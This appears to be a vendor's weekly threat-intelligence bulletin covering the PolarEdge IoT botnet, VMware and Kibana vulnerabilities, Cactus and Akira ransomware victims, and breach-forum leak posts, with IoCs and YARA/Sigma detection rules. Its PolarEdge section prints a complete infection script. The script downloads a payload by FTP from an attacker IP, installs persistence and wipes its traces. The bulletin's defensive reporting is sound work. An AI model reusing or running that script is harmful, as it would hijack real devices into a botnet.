Introduction
The Weekly Cybersecurity Bulletin report has been prepared by the ECHO Threat Intelligence team to summarize and inform about cybersecurity incidents that have occurred in recent weeks.
Executive Summary
This bulletin provides up-to-date information on:
– Cyber threats such as attacks, data breaches, malware, ransomware, and critical security vulnerabilities.
– Our security team analyzes these threats and prepares the weekly bulletin to minimize potential risks.
Featured Ransomware of the Week: PolarEdge IoT Botnet Malware
PolarEdge is a new type of botnet targeting IoT devices.
It compromises routers with inadequate security measures, NAS devices (QNAP), IP cameras, and other smart home devices to establish a persistent network.
The compromised devices, referred to as “zombies” (botnet nodes), are remotely controlled by attackers and used for DDoS attacks, cryptomining, or data theft.
Impact of the Malware
Massive DDoS Attacks: PolarEdge can create a vast source of DDoS attacks using hijacked devices.
Data Risks on QNAP and NAS Devices: Malicious payloads can access and exfiltrate backup files or critical data.
Distributed Architecture: The botnet operates thousands of devices across different regions, giving attackers access to a powerful “zombie network”.
Technical Steps of the Malware
Targets IoT devices such as Cisco, QNAP, Asus, and Synology.
Exploits critical RCE vulnerabilities, such as CVE-2023-20118 (Cisco SBR), to gain unauthorized access.
The attacker deploys a web shell on Cisco devices to integrate them into the botnet.
PolarEdge executes payloads specifically designed for IoT device architectures, such as MIPS64.
Since the last quarter of 2023, the PolarEdge botnet has been actively exploiting critical vulnerabilities, particularly in Asus, Cisco, QNAP, and Synology devices.
PolarEdge primarily spreads by leveraging vulnerabilities in IoT devices (such as default credentials or unpatched firmware). If manufacturer-provided updates are not applied or network access restrictions are insufficient, attackers infiltrate these devices and integrate them into the botnet.
For example, the malware exploits the critical RCE vulnerability (CVE-2023-20118) affecting Cisco SBR devices. By triggering this vulnerability, the attacker implants a web shell, allowing remote command-and-control operations.
Malware Code & Functions
Attackers deploy malicious scripts named `q` or `cipher_log`.
Malicious files are downloaded to IoT devices via FTP/HTTP.
It has been observed that PolarEdge attackers use FTP/HTTP protocols to upload malicious scripts like “q” or binary files such as “cipher_log” onto IoT devices. The payloads are specifically crafted for MIPS64-like architectures.
A shell script named “q” has been identified as a primary infection vector for PolarEdge. Additional scripts and payloads specifically designed for NAS devices like QNAP have also been detected.
#!/bin/sh
# Cleanup (log files, self-deletion, etc.)
rm -f /tmp/httpd.log /tmp/web.log
rm -f $0
rm -f /tmp/.lock
# MIPS64 architecture check
ARCH=$(uname -m)
if [ "$ARCH" != "mips64" ]; then
exit 1
fi
# Kill suspicious processes
touch /tmp/.lock
killall -9 ca config.exp process_monitor application
# Download malicious payload
ftpget -v -u polar -p 123456 119.8.186.227 /tmp/t.tar t.tar
SIZE=$(ls -l /tmp/t.tar | awk '{print $5}')
if [ "$SIZE" -lt 10000 ]; then
sleep 15
ftpget -v -u polar -p 123456 119.8.186.227 /tmp/t.tar t.tar
fi
tar xvf /tmp/t.tar -C /tmp/
cp /tmp/cipher_log /etc/flash/etc/
# Persistence mechanism
cat <<EOF > /etc/flash/etc/cipher.sh
while true; do
/etc/flash/etc/cipher_log
sleep 10
done
EOF
chmod +x /etc/flash/etc/cipher.sh
echo "/etc/flash/etc/cipher.sh &" >> /tmp/splitDB/BONJOUR
echo "/etc/flash/etc/cipher.sh &" >> /tmp/splitDB/SYSTEM
# Execution and Cleanup
/tmp/cipher_log &
killall httpd
rm -f /tmp/.lock
rm -f /tmp/cipher_log
Communication Mechanism of the Malware
TLS Backdoor: The device establishes an encrypted channel with the attacker over TLS.
Commands the Attacker Can Send:
Retrieve DDoS attack parameters.
Download and execute new malicious modules.
Report device information (model, network configuration, etc.).
Network and Firewall Manipulation:
Ports such as 443 (HTTPS/TLS) or 22 (SSH) may be opened for attack traffic.
Indicators of Compromise (IoCs)
IP Addresses (C2, Payload Hosting, etc.)
119.8.186[.]227 – FTP server hosting the malicious “t.tar” file
185.28.100[.]XX – Additional IPs scanned by PolarEdge during attacks
File Names
/tmp/q – Primary infection script
/tmp/t.tar – Downloaded tar archive
cipher_log – Malicious binary file
/tmp/.lock – Lock file used to prevent multiple executions
Webshell – sha256
**1ca7262f91d517853a0551b14abb0306c4e3567e41b1e82a018f0aac718e499e
PolarEdge botnet – sha256
**eda7cc5e1781c681afe99bf513fcaf5ae86afbf1d84dfd23aa563b1a043cbba8
**13cd040a7f488e937b1b234d71a0126b7bc74367bf6538b6961c476f5d620d13
**464f29d5f496b4acffc455330f00adb34ab920c66ca1908eee262339d6946bcd
**932b2545bd6e3ad74b82ca2199944edecf9c92ad3f75fce0d07e04ab084824d5
**121969d72f8e6f09ad93cf17500c479c452e230e27e7b157d5c9336dff15b6ef
PolarEdge botnet – Delivery infrastructure
**119.8.186[.]227
**longlog[.]cc
**landim[.]cc
**hitchil[.]cc
**Logchim[.]cc
**ssofhoseuegsgrfnu[.]ru
PolarEdge botnet – Reporting infrastructure
**aipricadd[.]top
**firebasesafer[.]top
**largeroofs[.]top
**siotherlentsearsitech[.]shop
**asustordownload[.]com
**gardensc[.]cc
**headached[.]cc
**durianlink[.]cc
**nternetd[.]cc
**suiteiol[.]cc
**centrequ[.]cc
**icecreand[.]cc
**159.138.119[.]99
**43.129.205[.]244
**122.8.183[.]181
**195.123.212[.]54
**Yara Rule**
rule PolarEdge_Botnet
{
meta:
description = "Detects PolarEdge IoT Botnet activity"
author = "ECHO"
date = "2025-03-06"
hash = "eda7cc5e1781c681afe99bf513fcaf5ae86afbf1d84dfd23aa563b1a043cbba8"
severity = "high"
strings:
$file_q = "/tmp/q"
$file_cipher_log = "/tmp/cipher_log"
$lock_file = "/tmp/.lock"
$payload_tar = "/tmp/t.tar"
$malicious_ip = "119.8.186.227"
$malicious_domain = "longlog.cc"
$cmd1 = "ftpget -v -u polar"
$cmd2 = "tar xvf"
$cmd3 = "killall"
$cmd4 = "rm -f"
$cmd5 = "/etc/flash/etc/cipher_log"
condition:
// Match the presence of critical files and commands
$file_q or
$file_cipher_log or
$lock_file or
$payload_tar or
$malicious_ip or
$malicious_domain or
($cmd1 and $cmd2) or
($cmd3 and $cmd4 and $cmd5)
}
**Sigma Rule**
title: Detect PolarEdge IoT Botnet Activity
id: 1234abcd-5678-efgh-ijkl-9876543210
description: Detects PolarEdge IoT Botnet activities such as malicious file downloads and execution, DDoS and crypto mining activities, and interactions with C2 infrastructure.
status: experimental
author: ECHO
date: 2025-03-06
logsource:
product: linux
service: system
detection:
selection:
# Detects file creation for known malicious files
- FileName|contains:
- "/tmp/q"
- "/tmp/cipher_log"
- "/tmp/.lock"
- "/tmp/t.tar"
# Detects network connections to known malicious IPs or domains
- DestinationIp|in:
- "119.8.186.227"
- DstHostname|contains:
- "longlog.cc"
condition: selection
fields:
- FileName
- DestinationIp
- DstHostname
- CommandLine
- ProcessName
falsepositives:
- None known
level: high
Malware Details and MITRE ATT&CK
| Technique Code | Technique Name |
|---|---|
| T1071 | Application Layer Protocol (C2 traffic over HTTP/HTTPS) |
| T1133 | External Remote Services (Telnet/SSH exploitation) |
| T1496 | Resource Hijacking (Exploitation of compromised devices) |
| T1059.003 | Command-Line Interface (Executing commands via Bash) |
| T1105 | Remote File Copy (File transfer) |
| T1070.004 | Indicator Removal on Host: File Deletion (Deleting malicious files) |
| T1005 | Data from Local System (Stealing data from the local system) |
Highlighted Vulnerabilities of the Week
Security Updates Released for Actively Exploited VMware Product Vulnerabilities
VMware has released security updates for ESXi, Workstation, and Fusion products that address actively exploited critical vulnerabilities.
These vulnerabilities allow attackers to execute code and leak sensitive information.
Vulnerability Details
CVE-2025-22224: TOCTOU Vulnerability Leading to Memory Overflow
Vulnerability Type: Code Execution
CVSS Score: 9.3
Details: The Time-of-Check Time-of-Use (TOCTOU) vulnerability enables out-of-bounds memory writes, allowing attackers to execute code under the VMX process of a virtual machine.
CVE-2025-22225: Arbitrary Write Vulnerability
Vulnerability Type: Sandbox Escape
CVSS Score: 8.2
Details: An attacker with privileges inside the VMX process can exploit this vulnerability to escape the sandbox environment and execute code on the host operating system.
CVE-2025-22226: Memory Leak in HGFS
Vulnerability Type: Information Disclosure
CVSS Score: 7.1
Details: Out-of-bounds memory reads in HGFS allow attackers to leak sensitive information from the VMX process memory.
Affected Products and Versions
| Product | Affected Versions | Fixed Version |
|---|---|---|
| VMware ESXi 8.0 and 7.0 | Affected versions | ESXi80U3d-24585383 and ESXi70U3s-24585291 |
| VMware Workstation 17.x | Affected versions | 17.6.3 |
| VMware Fusion 13.x | Affected versions | 13.6.3 |
| VMware Cloud Foundation 5.x and 4.x | Affected versions | ESXi80U3d-24585383 and ESXi70U3s-24585291 |
| VMware Telco Cloud Platform and Infrastructure | Affected versions | Relevant patches have been released |
Technical Details
CVE-2025-22224: The TOCTOU vulnerability allows an attacker to exploit race conditions to perform out-of-bounds memory writes. This can result in remote code execution on the host machine.
CVE-2025-22225: The arbitrary write vulnerability allows attackers to escape the virtualized environment and gain access to the underlying system.
CVE-2025-22226: The out-of-bounds read issue enables attackers to leak memory contents from the VMX process, potentially exposing sensitive information.
Kibana Critical Vulnerability: Risk of Executing Arbitrary Code
A critical security vulnerability has been identified in Kibana, the Elastic data visualization tool, allowing authenticated attackers to execute arbitrary code on systems.
Tracked as CVE-2025-25012, this vulnerability has been rated 9.9 on the CVSS v3.1 scale and stems from a prototype pollution issue.
Vulnerability Details
This vulnerability arises due to prototype pollution in Kibana’s file upload handler and HTTP request processing mechanisms.
Attackers can exploit this flaw to manipulate JavaScript object prototypes and bypass security controls.
As a result, attackers can execute arbitrary code on the system.
Attack Vector and MITRE ATT&CK:
– CWE-1321: Improper Control of Prototype Attributes Modification
– T1059: Command and Scripting Interpreter
Affected Versions
Kibana Versions and Exploitable User Roles:
| Version | Exploitable Roles |
|---|---|
| 8.15.0 – 8.17.0 | Users with the Viewer role |
| 8.17.1 – 8.17.2 | Users with Fleet-all, integrations-all, and actions:execute-advanced-connectors privileges |
This vulnerability is easily exploitable and does not require advanced tools or reverse engineering.
Technical Details
This vulnerability arises due to Kibana’s:
File upload handler
Prototype pollution in HTTP request processing
Attackers exploiting this flaw can:
Modify JavaScript object prototypes
Bypass security controls
Execute arbitrary code on the system
The attack vector is classified under CWE-1321 (Improper Control of Prototype Attributes Modification) and is associated with T1059 (Command and Scripting Interpreter) within the MITRE ATT&CK framework.
| Technique Code | Technique Name |
|---|---|
| T1071 | Application Layer Protocol (C2 traffic over HTTP/HTTPS) |
| T1059 | Command-Line Interface (Command execution via scripting) |
| T1070.004 | Indicator Removal on Host: File Deletion (Malicious file deletion) |
| T1105 | Remote File Copy (File transfer) |
| T1021.002 | Remote Services: SMB/NetSession (File transfer over remote connection) |
- Ransomware Attacks Targeting Companies
Quigley Eye Specialists
Group Name: Cactus
Victim: quigleyeye.com
Industry: Healthcare / Ophthalmology
Impact: Leakage of employee and patient personally identifiable information, internal company documents, and medical records.
Quigley Eye Specialists is a Florida-based medical and surgical clinic specializing in the diagnosis and treatment of vision disorders.
Leaked Data Types:
– Personally identifiable information
– Medical records
– Database backups
– Internal company documents
– Financial records
– Confidential corporate and personal communications
Yara Rule
rule CactusRansomware {
meta:
description = "rule to detect Cactus Ransomware"
author = "ECHO"
date = "2024-01-18"
Rule_Version = "v1"
malware_type = "ransomware"
malware_family = "Cactus"
License = "MIT License, https://opensource.org/license/mit/"
Hash = "9ec6d3bc07743d96b723174379620dd56c167c58a1e04dbfb7a392319647441a,c49b4faa6ac7b5c207410ed1e86d0f21c00f47a78c531a0a736266c436cc1c0a"
strings:
$strReadMe = "cAcTuS.readme.txt" wide
$strLockExt = ".cts" wide
$strTskName = "Updates Check Task" wide
$strTskName2 = "Google Service Update"
$strNTUSer = "ntuser.dat" wide
$strNTUSer2 = "ntuser.log" wide
$strBuilderName = "cactusbuilder"
condition:
uint16(0) == 0x5A4D and ($strReadMe and $strLockExt) and (1 of ($strTskName*)) and (1 of ($strNTUSer*)) or ($strBuilderName)
}
Forstenlechner Installationstechnik
Group Name: Akira
Victim: forstenlechner.com
Industry: Construction Technology / Mechanical Engineering
Impact: Leakage of over 41GB of critical corporate data, including employee and customer information.
Forstenlechner is a company founded by the Perger family, specializing in construction technology and mechanical engineering.
Leaked Data Types:
– Employee and customer contact information (phone numbers, email addresses)
– HR documents
– Social security numbers (SVNr)
– Financial data (audit reports, payment details)
– Confidential licenses
– Agreements and contracts
– Internal company documents
Yara Rule
/*
Akira ransomware
*/
rule Akira
{
meta:
author = "ECHO"
family = "Akira"
description = "Akira ransomware Windows payload"
severity = 10
score = 100
strings:
$s0 = "\x00--encryption_path\x00" ascii wide
$s1 = "\x00--share_file\x00" ascii wide
$s2 = "\x00--encryption_percent\x00" ascii wide
$s3 = "\x00-fork\x00" ascii
$s4 = "\x00-localonly\x00" ascii wide
$s5 = "\x00Failed to read share files\x00" ascii wide
$s6 = ":\\akira\\asio\\include\\" ascii
$s7 = "\x00write_encrypt_info error: \x00" ascii
$s8 = "\x00encrypt_part error: \x00" ascii
$s9 = "\x00Detected number of cpus = \x00" ascii
$s10 = "\x00No path to encrypt\x00" ascii
$s11 = "Paste this link - https://akira" ascii
$s12 = "\x00Trend Micro\x00" wide
$s13 = "Failed to make full encrypt" ascii wide
$s14 = "Failed to make spot encrypt" ascii wide
$s15 = "Failed to make part encrypt" ascii wide
$s16 = "Failed to write header" ascii wide
$s17 = "file rename failed. System error:" ascii wide
$s18 = "Number of thread to folder parsers = \x00" ascii
$s19 = "Number of threads to encrypt = \x00" ascii
$s20 = "Number of thread to root folder parsers = \x00" ascii
$s21 = "Failed to read share files!\x00" ascii
$h0 = { 41 BA 05 00 00 00 41 80 FB 32 44 0F 42 D0 33 D2 48 8B C?
49 F7 F2 4C 8B C8
( B? 02 00 00 00 [0-4] 41 B? 04 00 00 00 |
41 B? 04 00 00 00 [0-4] B? 02 00 00 00 )
41 80 FB 32 44 0F 42 C? 41 8B C8 4? 0F AF C? 48 2B F9 33 D2
48 8B C7 49 F7 F2 }
$h1 = { C7 45 ?? 03 00 00 00 80 7D ?? 31 76 07 C7 45 ?? 05 00 00 00
0F B6 45 ?? 48 0F AF 45 ?? 48 C1 E8 02
48 B? C3 F5 28 5C 8F C2 F5 28 48 F7 E? 48 89 ?? 48 C1 E8 02 }
condition:
(((uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)) or
(uint32(0) == 0x464C457F)) and
(
(7 of ($s*)) or
(1 of ($h*))
)
}
Ray Fogg Corporate Properties
Group Name: Akira
Victim: rayfogg.com
Industry: Real Estate / Commercial Property Management
Impact: Leakage of over 75 GB of critical corporate data
Ray Fogg Corporate Properties is a commercial real estate firm with a diverse portfolio of flexible office spaces, warehouses, and industrial properties available for lease.
Leaked Data Types:
– Financial data (audits, payment details, financial reports)
– Confidential licenses, agreements, and contracts
– Employee and customer contact information (phone numbers, email addresses)
– Internal company documents
Yara Rule
/*
Akira ransomware
*/
rule Akira
{
meta:
author = "ECHO"
family = "ransomware.akira.windows"
description = "Akira ransomware Windows payload"
severity = 10
score = 100
strings:
$s0 = "\x00--encryption_path\x00" ascii wide
$s1 = "\x00--share_file\x00" ascii wide
$s2 = "\x00--encryption_percent\x00" ascii wide
$s3 = "\x00-fork\x00" ascii
$s4 = "\x00-localonly\x00" ascii wide
$s5 = "\x00Failed to read share files\x00" ascii wide
$s6 = ":\\akira\\asio\\include\\" ascii
$s7 = "\x00write_encrypt_info error: \x00" ascii
$s8 = "\x00encrypt_part error: \x00" ascii
$s9 = "\x00Detected number of cpus = \x00" ascii
$s10 = "\x00No path to encrypt\x00" ascii
$s11 = "Paste this link - https://akira" ascii
$s12 = "\x00Trend Micro\x00" wide
$s13 = "Failed to make full encrypt" ascii wide
$s14 = "Failed to make spot encrypt" ascii wide
$s15 = "Failed to make part encrypt" ascii wide
$s16 = "Failed to write header" ascii wide
$s17 = "file rename failed. System error:" ascii wide
$s18 = "Number of thread to folder parsers = \x00" ascii
$s19 = "Number of threads to encrypt = \x00" ascii
$s20 = "Number of thread to root folder parsers = \x00" ascii
$s21 = "Failed to read share files!\x00" ascii
$h0 = { 41 BA 05 00 00 00 41 80 FB 32 44 0F 42 D0 33 D2 48 8B C?
49 F7 F2 4C 8B C8
( B? 02 00 00 00 [0-4] 41 B? 04 00 00 00 |
41 B? 04 00 00 00 [0-4] B? 02 00 00 00 )
41 80 FB 32 44 0F 42 C? 41 8B C8 4? 0F AF C? 48 2B F9 33 D2
48 8B C7 49 F7 F2 }
$h1 = { C7 45 ?? 03 00 00 00 80 7D ?? 31 76 07 C7 45 ?? 05 00 00 00
0F B6 45 ?? 48 0F AF 45 ?? 48 C1 E8 02
48 B? C3 F5 28 5C 8F C2 F5 28 48 F7 E? 48 89 ?? 48 C1 E8 02 }
condition:
(((uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)) or
(uint32(0) == 0x464C457F)) and
(
(7 of ($s*)) or
(1 of ($h*))
)
}
What’s Happening in the Hacker Forum World?
Aryaduta.com Hotels 2025 BIG BREACH HOT – Database, Leaked!
Date: March 5, 2025
Threat Actor: JumboJet
Forum: BreachForums
Post:
In March 2025, Aryaduta Hotels, a hospitality sector platform, suffered a massive data breach. This breach exposed sensitive information related to both customers and hotel management. The leaked database contains over 2.29 million records spanning 169 tables.
Breach Details:
– Over 2.29 million records
– 169 different tables
– Customer information
– Hotel management data
– Reservation details
– Payment history and billing information
The leaked database is in SQL format and has a size of 686.4 MB.
GasMobi – Leaked, Download!
Date: March 5, 2025
Threat Actor: Blinkers
Forum: BreachForums
Post:
In March 2025, GasMobi (gasmobi.com), a mobile marketing and affiliate platform, suffered a major data breach. This leak exposed sensitive data belonging to both customers and business partners.
Breach Details:
– 18,000 user records
– Email, Skype, and Telegram information
– Phone numbers and company details
– Passwords and token information
– Payment history and authentication documents
– Address and country details
The compressed leaked data is 368 MB, while the uncompressed version is 1.17 GB.
GasMobi’s management has not yet made an official statement regarding the breach.
THE AMERICAN ACADEMY OF DRAMATIC ARTS 300K USER, hacked by CyberJund
Date: March 6, 2025
Threat Actor: CyberJund
Forum: BreachForums
Post:
In March 2025, a major data breach targeted The American Academy of Dramatic Arts (AADA) (aada.edu). CyberJund, the threat actor behind the attack, announced the leak of 300,000 – 400,000 user records belonging to the academy.
Breach Details:
– Personal data of 5,000 famous actors
– Full name, gender, date of birth
– Email, phone number, and address
– City, state, postal code, and country details
– Interests and agent information
Access to the full leaked dataset is behind a paid access mechanism on the forum. The academy’s management has not yet issued a statement.
Want a demo for your company? Contact us here: https://echocti.com/schedule-a-demo/
